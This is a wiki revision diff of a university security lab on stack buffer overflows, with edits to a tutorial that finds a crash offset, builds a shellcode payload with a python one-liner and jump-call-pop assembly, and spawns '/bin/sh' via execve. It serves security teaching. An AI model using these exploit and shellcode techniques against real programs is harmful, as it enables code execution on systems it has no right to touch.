Show page

Differences

This shows you the differences between two versions of the page.

--- cns:labs:lab-04 [2020/11/02 18:09]
dennis.plosceanu [Phase 2: Finding the vulnerability]
+++ cns:labs:lab-04 [2022/10/31 17:22] (current)
mihai.dumitru2201 [Tasks]
@@ Line 33: / Line 33: @@
 ===== Tutorial  =====
-Let's write a simple shellcode which performs
+For this tutorial, our goal is to write, inject and use a simple shellcode. In the following steps, we will analyze a simple program, test payloads, assess the vulnerability, then create a shellcode and exploit the program. We will use a very simple shellcode, one that does:
 <code C>
 exit(1337);
@@ Line 110: / Line 111: @@
 </code>
-Notice that the program crashed. We can quickly determine that the program tried to return to **0x4141334141644141**, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group "AAdAA3AA" found at offset 64 in the pattern. This offset is where the return address is situated relative to our input.
+Notice that the program crashed. We can quickly determine that the program tried to return to **0x4141334141644141**, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group "AAdAA3AA" found at offset 64 in the pattern. This offset is where the old RBP is situated relative to our input.
 ==== Phase 3: Reliable crash ====
@@ Line 298: / Line 299: @@
 <code bash>
-python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12) + b'\x90\xdc\xff\xff\xff\xff')" > payload
+python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12) + b'\x90\xdc\xff\xff\xff\x7f')" > payload
 gdb-peda$ r < payload
 Starting program: vuln < payload
@@ Line 368: / Line 369: @@
 <code asm>
+BITS 64
     jmp string
 start:
-    pop rcx    ; pop address of `hello` variable in rcx
+    pop rsi ; pop address of `hello` variable in rsi (the 2nd syscall argument on 64 bits)
     [...]
+    syscall ; do syscall on 64 bits
 string:
     call start ; jump/trampoline back to start while storing the address of `hello` on the stack
@@ Line 377: / Line 381: @@
 </code>
-The call instruction will push the address of the next "instruction" (in this case, our string), onto the stack.
+The ''call'' instruction will push the address of the next "instruction" (in this case, our string), onto the stack.
 </note>
@@ Line 385: / Line 389: @@
 <code C>
-execve('/bin/sh', ['/bin/sh'], 0);
+execve("/bin/sh", ["/bin/sh", NULL], NULL);
 </code>
-Where //['/bin/sh']// denotes the **address** of the string '/bin/sh'.
+Where ''["/bin/sh", NULL]'' denotes the **address** of the array of two strings address: the address of the ''"/bin/sh"'' string and the ''NULL'' address.
 <note tip>
-You need to get the string '/bin/sh' on the stack. You can do this using the hack from the write challenge.
+You need to get the address of the string ''"/bin/sh"'' on the stack.
+You can do this using the hack from the write challenge.
 </note>
 <note tip>
-You can browse around shellstorm for examples; however, keep in mind that they may not work due to some registers not being set properly.
+You can browse around shellstorm for examples;
+however, keep in mind that they may not work due to some registers not being set properly.
 </note>
 ==== 3. execve with no zeros  ====

Resources

Labs

Lectures

Assignments

Extra

cns/labs/lab-04.1604333364.txt.gz · Last modified: 2020/11/02 18:09 by dennis.plosceanu

Show page Old revisions

Media Manager Back to top